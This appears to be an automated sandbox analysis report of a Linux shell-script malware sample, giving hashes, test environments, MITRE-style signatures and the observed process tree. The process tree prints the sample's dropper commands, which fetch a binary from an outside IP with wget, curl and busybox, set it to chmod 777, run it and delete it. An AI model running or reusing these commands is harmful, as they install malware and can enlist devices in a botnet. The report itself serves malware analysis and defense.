Analysis
-
max time kernel
22s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
28/10/2024, 02:19
Static task
static1
Behavioral task
behavioral1
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
-
Size
10KB
-
MD5
a5a9f72ca25763058aacf1994a85b616
-
SHA1
748843de754f9484c22ebf1e32e5894d70f4859f
-
SHA256
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86
-
SHA512
47f9975ff7556dfa8ceecd5af09a40a67e07ddd1478bfee1cbe1189d252b5fe35d0a098fa94c5aa6aa5694f33bb0b776685ddd59772184b7d42fa2a5d78e6cea
-
SSDEEP
192:oPTGhYwtdd5GFV2ER73e7jb18jgZPTGhYwDd5GFVW73e7jVIU:QgbEo18Uftx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh, command line: /tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh, PID: 1483
- /bin/rm, command line: /bin/rm bins.sh, PID: 1484
- /usr/bin/wget, command line: wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X, PID: 1485
- /usr/bin/curl, command line: curl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X, PID: 1490 (Writes file to tmp directory)
- /bin/busybox, command line: /bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X, PID: 1491
- /bin/chmod, command line: chmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X, PID: 1492 (File and Directory Permissions Modification)
- /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X, command line: ./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X, PID: 1493 (Executes dropped EXE)
- /bin/rm, command line: rm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X, PID: 1494
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97